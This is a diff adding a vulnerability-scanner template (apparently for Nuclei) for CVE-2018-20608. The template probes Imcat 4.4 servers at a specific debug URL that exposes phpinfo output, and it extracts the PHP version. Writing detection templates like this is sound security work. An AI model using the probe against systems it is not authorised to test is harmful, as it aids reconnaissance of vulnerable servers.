Create CVE-2018-20608.yaml

http/cves/2018/CVE-2018-20608.yaml

@@ -0,0 +1,38 @@
+id: CVE-2018-20608
+
+info:
+  name: Imcat 4.4 - Phpinfo Configuration
+  author: ritikchaddha
+  severity: high
+  description: Imcat 4.4 allows remote attackers to read phpinfo output via the root/tools/adbug/binfo.php?phpinfo1 URI.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-20608
+  classification:
+    cve-id: CVE-2018-20608
+  metadata:
+    max-request: 1
+  tags: cve,cve2018,imcat,phpinfo,config
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/imcat/root/tools/adbug/binfo.php?phpinfo1"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "PHP Extension"
+          - "PHP Version"
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        group: 1
+        regex:
+          - '>PHP Version <\/td><td class="v">([0-9.]+)'
+        part: body